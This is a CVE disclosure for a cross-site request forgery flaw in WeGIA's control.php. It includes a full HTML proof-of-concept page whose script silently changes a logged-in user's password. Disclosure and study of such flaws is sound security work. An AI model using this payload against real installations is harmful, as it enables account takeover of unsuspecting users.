CVE-2024-53472: CSRF in control.php to change password

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2024-53472

Vendor

WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions.

https://www.wegia.org

https://sol.sbc.org.br/index.php/latinoware/article/view/31544

Affected Product Code Base

WeGIA < v3.2.0

Vulnerability Description

A Cross-Site Request Forgery (CSRF) vulnerability was identified in the WeGIA application. This flaw enables an attacker to induce an authenticated user to perform unintended actions without their consent or awareness.

POC

This code allows an attacker to change the password of an authenticated user without their consent by loading this malicious page while the user is logged into the application.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit</title>
</head>
<body>
    <script>
        fetch("https://demo.wegia.org/controle/control.php", {
            method: "POST",
            headers: {
                "Content-Type": "application/x-www-form-urlencoded",
            },
            body: "senha_antiga=wegia&nova_senha=1234567&confirmar_senha=1234567&nomeClasse=FuncionarioControle&metodo=alterarSenha&redir=logout.php&id_pessoa=1&alterar=Alterar"
        })
        .then(response => response.text())
        .then(data => console.log(data))
        .catch(error => console.error('Error:', error));
    </script>
</body>
</html>

Reference

https://www.cve.org/CVERecord?id=CVE-2024-53472

Solution

https://github.com/nilsonLazarin/WeGIA/issues/790

Discoverer

Natan Maia Morette

Contributor

Diego Cardoso Borda Castro

By: CVE-Hunters